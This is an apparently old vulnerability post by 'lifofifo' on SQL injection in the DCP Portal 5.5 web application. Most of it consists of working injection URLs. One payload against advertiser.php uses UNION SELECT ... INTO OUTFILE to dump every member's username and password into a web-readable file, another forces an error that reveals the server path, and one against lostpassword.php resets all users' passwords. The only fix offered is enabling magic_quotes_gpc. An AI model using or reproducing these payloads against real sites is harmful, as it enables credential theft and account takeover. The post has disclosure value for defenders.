DCP Portal - 5.5 holes
Never use this product if you have turned off magic_quotes_gpc. And this
product won't work anyway if you have turned off register_globals.
All the files in the product, dont check for integrity of variables. You can
easily exploit this using some SQL Injection techniques. For example, if you
want to get username/password of all the users, you can exploit advertiser.php.
Open it like,
http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or
1=1 UNION select uid,name,password,surname,job,email from dcp5_members into
outfile 'c:/apache2/htdocs/dcpad.txt
This is for windows, if web-server is running on *nix, then you could enter
something like,
http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or
1=1 UNION select uid,name,password,surname,job,email from dcp5_members into
outfile '/var/www/html/dcpad.txt
In this cases, you will need to enter the absolute path. For that, run the
follwing
http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that
will show the path to the sever if they have turned on display_errors in
php.ini.
That's all ! Notice that here we are using UNION function in query. For that,
the host should be running version MySQL 4.x. Well, if it's not running 4.x, No
problem, we have another file !
This time it's lostpassword.php.
Open it like,
http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'
This will really cause some damage. It will reset password of everyone.
Everyone will get as many mails as the number of users. And evryone's password
will be the one provided in the last email.
I didn't have time to check if there was injection possible with some numeric
field. If it's there, one can launch select-fish attacks, which would work even
in case of magic_quotes_gpc is on.
Fix : Insteading of fixing it, simply turn on magic_quotes_gpc. Otherwise it
will take you as much time as they took in making DCP Portal.
-lifofifo
http://www.hackingzone.org/